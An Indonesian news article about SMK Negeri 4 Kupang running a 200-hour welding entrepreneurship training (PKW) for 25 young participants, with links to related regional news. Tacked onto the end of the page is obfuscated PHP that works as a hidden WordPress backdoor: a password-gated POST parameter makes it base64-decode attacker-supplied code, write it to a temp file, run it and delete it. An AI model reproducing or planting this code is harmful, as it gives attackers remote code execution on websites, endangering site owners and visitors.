SMK Negeri 4 Kupang Dipercaya Mengelola PKW Bagi 25 Orang Peserta

Kamis, 9 Desember 2021 - 10:15 WITA

facebook twitter whatsapp telegram line copy

URL berhasil dicopy

facebook icon twitter icon whatsapp icon telegram icon line icon copy

URL berhasil dicopy

Kupang – Suarafaktahukum.com
Pandemi covid-19 memberikan dampak yang signifikan terhadap berbagai sektor dan tidak terkecuali dampak ekonomi yang dialami oleh para millenials atau usia produktif. Salah satu bentuk upaya pemerintah daerah Nusa Tenggara Timur untuk mengatasi dampak ini adalah dengan melakukan kerjasama dengan pemerintah pusat melalui Direktorat Kursus dan Pelatihan, Dirjen Vokasi Kemdikbud Ristek RI dalam program Pendidikan Kecakapan Wirausaha (PKW) bagi para millenials.
SMK Negeri 4 Kupang sebagai salah satu lembaga yang dipercaya untuk mengelola pelatihan PKW bagi 25 orang peserta untuk pelatihan teknik las busur manual selama 200 jam tatap muka dan di akhir dari kegiatan pelatihan tersebut, setiap peserta diberikan bantuan rintisan modal usaha berupa paket peralatan las dan bahan produksi.

Semi Ndolu, S.Pd selaku kepala SMKN 4 Kupang dalam press rilisnya mengatakan bahwa peserta tidak hanya dilatih kompetensi las dan diberikan peralatan las dan bahan saja , namun juga dihubungkan dengan lembaga Penyedia modal usaha seperti Bank BRI dan Koperasi Sangosai dalam penandatanganan MoU pada akhir Nopember lalu. Kami juga akan terus melakukan pendampingan bagi para peserta untuk bisa survive dalam usaha karena telah kami siapkan website marketplace sehingga peserta akan lebih mudah memasarkan produk dan jasa las mereka.

Hadir dalam acara penyerahan bantuan peralatan las tersebut yang bertempat di aula SMKN 4 Kupang pada Rabu, 8-12-2021 adalah Kepala Dinas Perindag Prov. NTT (Ketua Harian Dekranasda NTT) dan sejumlah pengurus Dekranasda NTT yang juga turut memberikan apresiasi bagi SMKN 4 Kupang yang tak henti-hentinya memberikan kontribusi dan inovasi bagi pengembangan ekonomi kreatif khususnya bagi generasi muda. SMK ini menjadi sekolah model sekaligus sekolah imbas bagi yang lain. Karena itu kepada para peserta pelatihan, diharapkan setelah menerima bantuan peralatan dan bahan ini, jangan tidur, tapi terus berusaha dan mengembangkan usaha melalui keterampilan/skill yang sudah diperoleh. pemerintah Nusa Tenggara Timur sangat mendukung program-program pemberdayaan masyarakat seperti ini, sehingga peserta pelatihan juga harus terus semangat membuka usaha apalagi masih usia produktif.

Senada dengan itu, Ny. Julie Sutrisno Laiskodat selaku Ketua Dekranasda NTT dalam arahannya melalui sambungan telepon, mengajak seluruh masyarakat khususnya kaum millenials untuk mulai memiliki pandangan “mengakar lokal, dihormati global”.

Para peserta PKW SMKN 4 Kupang ini menambah lagi jumlah 1.000 millenials peserta PKW yang ditraining oleh Dekranasda NTT melalui 17 Dekranasda kabupaten melalui tenun. Sehingga total peserta PKW yang dilatih dan mendapatkan bantuan rintisan usaha dan sekaligus menjadi calon wirausaha baru berjumlah 1.025 orang tahun ini. Selamat kepada seluruh peserta dan Terimakasih kepada SMKN 4 Kupang.

Berita Terkait

Danrem 161/Wira Sakti pimpin Acara Sertijab dan Laporan Tradisi Korps Kasi Log Kasrem 161/Wira Sakti
Pj. Gubernur NTT Gelar Jamuan Makan Malam Bersama Duta Besar Vatikan untuk Indonesia, Para Kardinal dan Para Uskup Se-Indonesia dan Timor Leste
Lantik Penjabat Bupati Kupang dan Ende, Ayodhia Kalake Minta Berikan Pengabdian dan Pelayanan yang Tulus
Penjabat Gubernur Ayodhia Kalake Lantik dan Kukuhkan 27 Pejabat Pimpinan Tinggi Pratama Lingkup Pemprov NTT
Penjabat Gubernur Launching Alat Kesehatan Kateterisasi Jantung di RSUD. Prof. Dr. W. Z. Johannes Kupang
Penjabat Gubernur Buka Kegiatan Bakti Sosial Operasi Katarak dan Penghijauan di Lingkungan RSUP dr.Ben Mboi
Anggota TNI Mendapat Penyuluhan Hukum di Makorem 161/Wira Sakti
Inovasi Hebat, Masyarakat Belu yang Sehat, Berkarakter dan Kompetitif

Berita Terkait

Minggu, 3 September 2023 - 11:57 WITA

GUBERNUR NTT DAN WAKIL MENGUCAPKAN HUT RI KE-78

Rabu, 21 Desember 2022 - 09:38 WITA

UCAPAN SELAMAT HARI RAYA NATAL DAN TAHUN BARU

Rabu, 21 Desember 2022 - 09:32 WITA

UCAPAN SELAMAT HARI RAYA NATAL DAN TAHUN BARU

Minggu, 16 Oktober 2022 - 09:58 WITA

Pertemuan Delegasi Indonesia dengan Pemerintah Timor-Leste terkait Zona Perdagangan Bebas

Minggu, 2 Oktober 2022 - 12:43 WITA

PENPROV NTT MENGUCAPKAN TURUT BERDUKA CITA

Jumat, 19 Agustus 2022 - 12:37 WITA

DIRGAHAYU REPUBLIK INDONESIA KE 77 17 AGUSTUS 2022

Rabu, 6 Juli 2022 - 17:24 WITA

Mayjen TNI Sonny ; Manfaatkan Lahan Kosong Untuk Tanam Marungga

Selasa, 24 Mei 2022 - 17:12 WITA

IKLAN ULANG TAHUN SEKDA NTT

Berita Terbaru

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}